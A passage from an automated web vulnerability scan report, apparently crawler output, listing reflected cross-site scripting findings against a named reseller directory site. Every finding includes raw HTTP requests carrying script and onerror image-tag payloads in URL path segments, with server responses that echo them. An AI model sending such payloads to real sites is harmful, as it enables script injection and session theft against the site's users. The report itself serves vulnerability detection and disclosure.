GET /tag/dropshipper110b0</title><img%20src%3da%20onerror%3dalert(1)>3ba171cd952 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:28:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: dropshipper110b0</title><img src=a onerror=alert(1)>3ba171cd952</title>
...[SNIP]...

2.4259. http://www.resellerbase.com/tag/dropshipper [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/dropshipper

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cafd1<img%20src%3da%20onerror%3dalert(1)>0b7215ed52d was submitted in the REST URL parameter 2. This input was echoed as cafd1<img src=a onerror=alert(1)>0b7215ed52d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/dropshippercafd1<img%20src%3da%20onerror%3dalert(1)>0b7215ed52d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:28:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: drops
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : dropshippercafd1<img src=a onerror=alert(1)>0b7215ed52d]</td>
...[SNIP]...

2.4260. http://www.resellerbase.com/tag/dropshipping [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/dropshipping

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ab6d0<script>alert(1)</script>05bce2dae9c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagab6d0<script>alert(1)</script>05bce2dae9c/dropshipping HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagab6d0<script>alert(1)</script>05bce2dae9c/dropshipping was not found on this server.</p>
...[SNIP]...

2.4261. http://www.resellerbase.com/tag/eBook [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/eBook

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4c874<script>alert(1)</script>4cd9ac1d94e8854dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag4c874<script>alert(1)</script>4cd9ac1d94e8854dd/eBook?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/eBook
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag4c874<script>alert(1)</script>4cd9ac1d94e8854dd/eBook?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4262. http://www.resellerbase.com/tag/eBook [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/eBook

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 40774<script>alert(1)</script>166a755a9a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag40774<script>alert(1)</script>166a755a9a2/eBook HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag40774<script>alert(1)</script>166a755a9a2/eBook was not found on this server.</p>
...[SNIP]...

2.4263. http://www.resellerbase.com/tag/eBook [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/eBook

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5a978<img%20src%3da%20onerror%3dalert(1)>3a5fd0d9b1b was submitted in the REST URL parameter 2. This input was echoed as 5a978<img src=a onerror=alert(1)>3a5fd0d9b1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/eBook5a978<img%20src%3da%20onerror%3dalert(1)>3a5fd0d9b1b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: eBook
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : eBook5a978<img src=a onerror=alert(1)>3a5fd0d9b1b]</td>
...[SNIP]...

2.4264. http://www.resellerbase.com/tag/eBook [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/eBook

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload fdab6</title><img%20src%3da%20onerror%3dalert(1)>2f72a943d3d was submitted in the REST URL parameter 2. This input was echoed as fdab6</title><img src=a onerror=alert(1)>2f72a943d3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/eBookfdab6</title><img%20src%3da%20onerror%3dalert(1)>2f72a943d3d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: eBookfdab6</title><img src=a onerror=alert(1)>2f72a943d3d</title>
...[SNIP]...

2.4265. http://www.resellerbase.com/tag/email+fax [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/email+fax

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fae1b<script>alert(1)</script>d1b3650c29a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagfae1b<script>alert(1)</script>d1b3650c29a/email+fax HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagfae1b<script>alert(1)</script>d1b3650c29a/email+fax was not found on this server.</p>
...[SNIP]...

2.4266. http://www.resellerbase.com/tag/flights [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/flights

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e1214<script>alert(1)</script>67df1e2891b4ab34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tage1214<script>alert(1)</script>67df1e2891b4ab34/flights?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/flights
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tage1214<script>alert(1)</script>67df1e2891b4ab34/flights?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4267. http://www.resellerbase.com/tag/flights [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/flights

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3b6d7<script>alert(1)</script>2f6e6dc69b8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag3b6d7<script>alert(1)</script>2f6e6dc69b8/flights HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag3b6d7<script>alert(1)</script>2f6e6dc69b8/flights was not found on this server.</p>
...[SNIP]...

2.4268. http://www.resellerbase.com/tag/flights [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/flights

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 21ee5<img%20src%3da%20onerror%3dalert(1)>7b2e78f7882447664 was submitted in the REST URL parameter 2. This input was echoed as 21ee5<img src=a onerror=alert(1)>7b2e78f7882447664 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/flights21ee5<img%20src%3da%20onerror%3dalert(1)>7b2e78f7882447664?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/flights
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: fligh
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : flights21ee5<img src=a onerror=alert(1)>7b2e78f7882447664]</td>
...[SNIP]...

2.4269. http://www.resellerbase.com/tag/flights [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/flights

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c40c7<img%20src%3da%20onerror%3dalert(1)>62fa1b45868 was submitted in the REST URL parameter 2. This input was echoed as c40c7<img src=a onerror=alert(1)>62fa1b45868 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/flightsc40c7<img%20src%3da%20onerror%3dalert(1)>62fa1b45868 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: fligh
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : flightsc40c7<img src=a onerror=alert(1)>62fa1b45868]</td>
...[SNIP]...

2.4270. http://www.resellerbase.com/tag/flights [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/flights

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 2e057</title><img%20src%3da%20onerror%3dalert(1)>202e60fe594 was submitted in the REST URL parameter 2. This input was echoed as 2e057</title><img src=a onerror=alert(1)>202e60fe594 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/flights2e057</title><img%20src%3da%20onerror%3dalert(1)>202e60fe594 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: flights2e057</title><img src=a onerror=alert(1)>202e60fe594</title>
...[SNIP]...

2.4271. http://www.resellerbase.com/tag/flights [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/flights

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload ed663</title><img%20src%3da%20onerror%3dalert(1)>4ddfc79c1fe4e5039 was submitted in the REST URL parameter 2. This input was echoed as ed663</title><img src=a onerror=alert(1)>4ddfc79c1fe4e5039 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/flightsed663</title><img%20src%3da%20onerror%3dalert(1)>4ddfc79c1fe4e5039?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/flights
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: flightsed663</title><img src=a onerror=alert(1)>4ddfc79c1fe4e5039</title>
...[SNIP]...

2.4272. http://www.resellerbase.com/tag/german [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/german

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cec79<script>alert(1)</script>ab226175feb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagcec79<script>alert(1)</script>ab226175feb/german HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:55:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagcec79<script>alert(1)</script>ab226175feb/german was not found on this server.</p>
...[SNIP]...

2.4273. http://www.resellerbase.com/tag/german [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/german

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload b808e</title><img%20src%3da%20onerror%3dalert(1)>ce3c292bf0b was submitted in the REST URL parameter 2. This input was echoed as b808e</title><img src=a onerror=alert(1)>ce3c292bf0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/germanb808e</title><img%20src%3da%20onerror%3dalert(1)>ce3c292bf0b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: germanb808e</title><img src=a onerror=alert(1)>ce3c292bf0b</title>
...[SNIP]...

2.4274. http://www.resellerbase.com/tag/german [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/german

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9d288<img%20src%3da%20onerror%3dalert(1)>d4e99a3ab56 was submitted in the REST URL parameter 2. This input was echoed as 9d288<img src=a onerror=alert(1)>d4e99a3ab56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/german9d288<img%20src%3da%20onerror%3dalert(1)>d4e99a3ab56 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: germa
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : german9d288<img src=a onerror=alert(1)>d4e99a3ab56]</td>
...[SNIP]...

2.4275. http://www.resellerbase.com/tag/googlepr.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 43de0<script>alert(1)</script>65dc54f074 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag43de0<script>alert(1)</script>65dc54f074/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag43de0<script>alert(1)</script>65dc54f074/googlepr.php was not found on this server.</p>
...[SNIP]...

2.4276. http://www.resellerbase.com/tag/googlepr.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fe9a7<script>alert(1)</script>e851b81a620274380 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagfe9a7<script>alert(1)</script>e851b81a620274380/googlepr.php?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/googlepr.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:48 GMT
Server: Apache/2
